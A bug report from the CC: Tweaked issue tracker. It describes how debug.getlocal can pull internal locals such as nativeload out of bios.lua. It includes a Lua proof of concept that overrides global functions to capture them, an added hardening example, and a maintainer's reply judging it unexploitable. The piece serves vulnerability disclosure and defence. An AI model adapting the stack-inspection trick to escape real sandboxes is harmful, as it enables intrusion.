CC: Tweaked


debug.getlocal can get locals from bios.lua

KittyCatCode opened this issue · 1 comments

commented

With the debug library, it's possible to get locals from any function below your function being executed. This affects some local variables in bios.lua because some functions call global, overwritable, functions. Some of the locals in bios expose important functions, like nativeload, nativeget/setfenv, and nativeHTTPRequest. Proof of concept getting nativeload:

```lua
local oldT = type
local oldE = error
-- Resolve `name` as seen from the caller's caller (stack level 3):
-- first its locals, then its upvalues, then its environment table.
local function getvarvalue(name)
  local v,f
  local i = 1
  while true do
    local n,va = debug.getlocal(3,i)
    if not n then break end
    if n == name then
      v = va
      f = true
    end
    i = i + 1
  end
  if f then return v end
  local fu = debug.getinfo(3).func
  i = 1
  while true do
    local n, va = debug.getupvalue(fu, i)
    if not n then break end
    if n == name then return va end
    i = i + 1
  end
  return getfenv(fu)[name]
end
local log = fs.open("log", "w")
-- Override the global `type`; when it is entered from the bios.lua frame
-- of interest, read that frame's `nativeload` local and store it globally.
_G.type = function(a)
  local b = debug.traceback()
  log.writeLine(b)
  if b:find("bios.lua:25:") then
    _G.nativeload = getvarvalue("nativeload")
    log.writeLine("Attempted to get nativeload, stored to global.")
  end
  return oldT(a)
end
-- Override `error` so the bios argument check only logs instead of raising.
_G.error = function(a)
  log.writeLine("ERR: "..a)
  log.writeLine(debug.traceback())
end
pcall(load,9)
-- Restore the original globals and flush the log.
_G.error = oldE
_G.type = oldT
log.close()
```
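An added illustration, not code from the issue or from CC: Tweaked, of the pattern the report describes and the usual defence against it: a function that resolves `type` through the global table on every call exposes its locals to whatever `_G.type` currently points at, while one that captured `type` as a local at definition time never enters the override at all. The `checkedLoad_*` functions, the `secret` local and `probe` are hypothetical stand-ins; it runs on stock Lua 5.1+ with the `debug` library present.

```lua
-- Hypothetical "bios-style" function: looks `type` up in _G on every call,
-- so a replaced global runs with this frame (and its locals) directly below it.
local function checkedLoad_global(chunk)
  local secret = "native loader handle"   -- stands in for a local like nativeload
  if type(chunk) ~= "string" then error("expected string", 2) end
  return secret
end

-- Hardened variant: bind the global once, when the module is defined, so a
-- later reassignment of _G.type is never called from this frame.
local type_ = type
local function checkedLoad_local(chunk)
  local secret = "native loader handle"
  if type_(chunk) ~= "string" then error("expected string", 2) end
  return secret
end

-- Exposure check: temporarily install a `type` override that only records
-- whether its caller's frame has a local named `secret`; it copies nothing.
local function probe(fn)
  local leaked = false
  local real_type = type
  _G.type = function(v)
    local i = 1
    while true do
      local name = debug.getlocal(2, i)  -- level 2 = the function that called type()
      if not name then break end
      if name == "secret" then leaked = true end
      i = i + 1
    end
    return real_type(v)
  end
  pcall(fn, 9)        -- non-string argument; the error() call is swallowed by pcall
  _G.type = real_type -- always restore the real global
  return leaked
end

-- The global-lookup version hands its locals to the override; the
-- local-alias version never invokes it, so nothing is reachable.
assert(probe(checkedLoad_global) == true)
assert(probe(checkedLoad_local) == false)
```

The same reasoning applies to `debug.getupvalue` and `getfenv`: an untrusted caller should not be handed a `debug` table that exposes them, and library code that must run below untrusted frames should alias every global it calls.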
commented

Whilst this is technically true, I don't think it's exploitable in any way. Whilst bios.lua includes some implementation-specific code (such as the Lua 5.1/5.2 abstractions), it doesn't expose anything related to the sandbox - that's entirely implemented in Java.